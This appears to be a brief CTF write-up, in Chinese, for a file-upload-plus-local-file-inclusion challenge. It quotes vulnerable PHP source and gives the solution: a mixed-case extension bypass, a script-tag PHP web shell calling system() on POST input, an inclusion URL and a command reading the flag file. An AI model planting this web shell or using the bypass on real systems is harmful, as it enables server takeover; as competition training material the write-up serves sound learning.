【A立方】2021华为计算AI安全冬令营ctf

EzUpload

文件上传加包含！！

User-agent:*
Disallow:/file_up1oad.php

<?php
    error_reporting(0);
    highlight_file(__FILE__);
    $file = $_GET['file'];
    if (preg_match("/flag/", $file)){
        die('Oh no!');
    }
    include $file;
    ?>

<?php
error_reporting(0);
date_default_timezone_set('PRC');
if(isset($_FILES['file'])) {
    $file_name = basename($_FILES["file"]["name"]);
    $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
    $file_type = $_FILES['file']['type'];
    $file_content = $_FILES['file']['tmp_name'];
    if(in_array($file_ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {
        die('Php file ?');
    }
    if (!in_array($file_type, ['image/jpeg', 'image/gif', 'image/png'])){
        die('Bad file');
    }
    if (preg_match("/<\?php|eval|assert|@/i", file_get_contents($file_content))){
        die('Bad file of content !');
    }
    if (!file_exists('uploads')){
        mkdir('uploads');
    }
    $new_filename = md5(time()).'.'.$file_ext;
    $u = move_uploaded_file($_FILES['file']['tmp_name'], './uploads/' . $new_filename);
    if ($u){
        echo 'Successful'."\n";
        echo '/uploads/'.$new_filename;
    }
}
?>
<html>
<body>
<meta charset="UTF-8">
<h2>File upload</h2>
<form action="" method="post" enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file"/><br />
    <input type="submit" name="submit" value="submit" />
</form>
</body>
</html>

http://183.129.189.60:10000/?file=/var/www/html/uploads/feb9d6ed9eecff131277446b72c506d8.PHp

<script language="php">system($_POST[a]);echo 11111;</script>

cat /flag.php